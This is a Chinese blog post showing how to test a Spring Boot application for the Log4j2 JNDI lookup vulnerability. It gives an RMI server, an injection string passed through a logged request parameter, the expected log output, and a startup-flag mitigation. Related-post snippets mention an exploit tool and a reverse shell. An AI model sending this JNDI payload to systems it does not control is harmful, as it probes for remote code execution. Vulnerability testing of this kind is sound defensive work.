log4j2 漏洞测试

最新推荐文章于 2024-08-01 15:05:06 发布
最新推荐文章于 2024-08-01 15:05:06 发布
阅读量3.2k 收藏
点赞数
分类专栏: Java 文章标签: java spring boot log4j2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuwiejie/article/details/121934690
版权

1、服务端
java版本 1.8
新建立目录
mkdir demo

新建文件
MyRemoteService.java

内容如下

import java.rmi.Remote;
import java.rmi.RemoteException;
 
public interface MyRemoteService extends Remote {
	public String sayHello() throws RemoteException;
}

Server.java

import java.rmi.Naming;
import java.rmi.registry.LocateRegistry;
 
public class Server {
	public static void main(String[] args) {
		try {
			MyRemoteService service = new MyRemoteServiceImpl();
			LocateRegistry.createRegistry(12345);
			Naming.rebind("rmi://148.153.66.198:12345/RemoteHello", service);// 绑定本地rmiregistry端口
			System.out.println("servier running");
		} catch (Exception e) {
			e.printStackTrace();
		}
	}
}

在当前目录执行命令

javac *.java
java Server

2、项目
springboot 里面,在java目录下也新建立一个和服务器一样的MyRemoteService.java ,内容一致

新建立一个post 接口,body 包含test参数

logger.info("test_log4j: {}", test);

启动项目,调用测试接口,参数变量传:

${jndi:rmi://127.0.0.1:12345/RemoteHello}

查看日志打印,如没有修复漏洞,日志打印如下:

test_log4j:Proxy[MyRemoteService,RemoteObjectinvocationHandler[UnicastRef[liveRef:[endpoint:[127.0.0.1:41441)(r
emote),objID:[-15adb53:17b6c81be4:-7fff,-8958342993681366219]1111

如修复漏洞,日志打印如下:

test_log4j:$(jndi:rmi://127.0.0.1:12345/RemoteHello}

简单漏洞修复:
java启动参数追加:

java -Dlog4j2.formatMsgNoLookups=true

仅供参考,漏洞测试

武炜颉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Apache Log4j2漏洞
Mr.xing的博客
11-13 739
Log4j2是一个Java日志组件,被各类Java框架广泛使用,它的前身是Log4j,Log4j2重新构建和设计了框架。本次漏洞影响范围为Log4j2最早期的版本2.0-beta9到2.15.0。Log4j只有一个jar包log4j-${版本号}.jar。Log4j2分为2个jar包,一个是接口log4j-api-${版本号}.jar,一个是具体实现log4j-core-${版本号}.jar。Log4j2的版本号目前均为2.x。Log4j的版本号均为1.x。
log4j2漏洞检测工具
05-07
**Log4j2漏洞检测工具详解** 在当前的IT环境中,安全问题日益凸显,特别是针对开源组件的安全漏洞Log4j2,一个广泛使用的Java日志框架,最近曝出的重大安全漏洞(CVE-2021-44228,被称为Log4Shell)引起了全球的...
log4j2漏洞检测和利用
qq_40909772的博客
12-07 1567
漏洞检测使用的是BP插件,插件地址。 JNDI注入工具,工具地址 https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0,命令如下: 将以下命令进行base64编码,IP替换为你攻击机IP。 使用工具命令如下: burp发包: 反弹shell成功:
探索与实践:log4jpwn——Log4j漏洞测试环境
gitblog_00079的博客
06-09 253
探索与实践:log4jpwn——Log4j漏洞测试环境 项目地址:https://gitcode.com/leonjza/log4jpwn 在网络安全领域,及时发现并应对漏洞是至关重要的。最近,Log4j框架中出现了一个严重漏洞,被称为"Log4Shell"(CVE-2021-44228)。为了帮助开发者和安全研究人员理解这一漏洞,并测试其影响范围,我们向您推荐一个名为log4...
Apache Log4j2 漏洞原理
m0_49025459的博客
06-26 1988
Apache Log4j被发现存在一处任意代码执行漏洞,由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。经验证,Apache Struts2、Apache Solr、Apache Druid、Apache Flink等众多组件与大型应用均受影响。
Log4j 漏洞测试
2401_84092694的博客
04-20 385
今天的文章可谓是积蓄了我这几年来的应聘和面试经历总结出来的经验,干货满满呀!如果你能够一直坚持看到这儿,那么首先我还是十分佩服你的毅力的。所以看完之后,还是多多行动起来吧!可以非常负责地说,如果你能够坚持把我上面列举的内容都一个不拉地看完并且全部消化为自己的知识的话,那么你就至少已经达到了中级开发工程师以上的水平,进入大厂技术这块是基本没有什么问题的了。首先我还是十分佩服你的毅力的。所以看完之后,还是多多行动起来吧!
日志框架log4j升级至log4j2
热门推荐
沉淀、分享、成长,让自己和他人都能有所收获!
06-28 2万+
大家好,我是默语,擅长全栈开发、运维和人工智能技术。在这篇博客中,我将详细介绍如何将日志框架从Log4j升级到Log4j2,确保在项目中实现更高效、更安全的日志管理。关键词:Log4j2升级、日志框架、Java日志、SLF4J、Log4j2配置。升级步骤具体操作删除Log4j核心包注释Log4j依赖,并排除第三方包引入的Log4j引入Log4j2和SLF4J桥接包添加Log4j2核心包和SLF4J与Log4j2的桥接包修改日志打印代码使用SLF4J的LoggerFactory进行日志打印。
Apache Log4j2漏洞复现
qq_62056583的博客
07-20 707
复现并分析【CVE-2021044228】Apache Log4j2 Server 反序列化命令执行漏洞,使用docker技术搭建漏洞环境,在实验环境中复现该漏洞
Log4j2远程代码执行漏洞
2301_82000839的博客
07-08 913
log4j2漏洞java应用常见开源日志库,是一个就Java的日志记录工具Apache Log4j2中存在JNDI注入漏洞,主要原理是利用log4j2的日志输出JNDI远程对象时,调用远程对象没做检查导致,程序将用户输入的数据进行日志记录时即可触发该漏洞并可在目标服务器上执行任意代码。该漏洞利用过程需要找到一个能触发远程加载并应用配置的输入点,迫使服务器远程加载和修改配置的前提下使目标系统通过JNDI远程获取数据库源,触发攻击者的恶意代码。
Log4j2JNDI注入漏洞复现测试
zhangxm_qz的博客
12-19 2984
文章目录漏洞概述代码测试防护办法 漏洞概述 log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 代码测试 测试环境 我这里采用jdk1.8 211 创建并发布RMI服务 创建maven项目并,增加两个类,如下: 代码分别如下: package testRMI.service; import com.sun.jndi.rmi.registry.ReferenceWrapper; import testRMI.service.IService; import t
Log4j2漏洞复现
qq_38675102的博客
02-21 528
vulhub靶场Log4j2漏洞复现
log4j2.17.2
04-14
总结,log4j2.17.2是应对Log4j2 RCE漏洞的重要更新,通过加强安全配置和限制危险功能,为Java应用程序提供了更坚固的安全屏障。对于依赖Log4j2的系统而言,及时升级至该版本是保障系统安全、防范潜在风险的有效手段...
log4j远程执行漏洞测试源码
12-22
通常,这样的资源会包含一个可运行的示例,展示如何利用Log4j漏洞,或者帮助开发者检测其应用中的漏洞。 **Log4j远程执行漏洞详解** Log4j是Apache的一个开源日志框架,广泛用于Java应用程序,用于记录应用程序...
log4j2_rce 项目
02-23
《深入理解Log4j2 RCE漏洞:从概念到实战》 在信息技术领域,安全问题始终是关注的焦点。本文将深入探讨一个重要的安全漏洞——Log4j2远程代码执行(RCE)漏洞,该漏洞曾引起全球广泛关注。我们将从项目标题"Log4j2...
log4j2版本漏洞 修复版本2.16.0
12-17
Log4j2版本漏洞与修复方案:聚焦2.16.0》 在软件安全领域,漏洞的存在如同定时炸弹,随时可能引发严重后果。其中,Log4j2漏洞问题备受关注,尤其是在2021年曝光的“Log4Shell”漏洞(CVE-2021-44228)更是引起...
使用hutool工具判断字符串是否全部是字母(包括大小写),java判断字符串是否全部是字母(包括大小写)
qq_43700885的博客
07-29 588
1.导入hutool的maven依赖。2.复制一下代码执行。
社区养老服务小程序的设计
Karen198的博客
07-31 505
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
深入理解Java注解
最新发布
weixin_55745942的博客
08-01 545
Java注解是用来描述程序元素(如类、方法、变量等)的一种机制。它们可以提供关于程序的补充信息,帮助编译器、框架或其他工具更好地理解和处理代码。注解通常以符号开头,后跟注解名称和可能的参数。要创建自定义注解,需要使用@interface关键字定义一个接口,并在接口中声明注解的属性。这个注解名为,可以被用来标记方法。它有一个名为value的属性,具有默认值"default"。
log4j漏洞测试步骤
08-05
log4j漏洞测试是为了检测和验证系统中是否存在log4j漏洞,以下是一种常见的log4j漏洞测试步骤: 1. 查看系统中是否使用了log4j:首先,我们需要确认系统是否使用了log4j作为日志记录框架。可以查看系统代码或者依赖...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值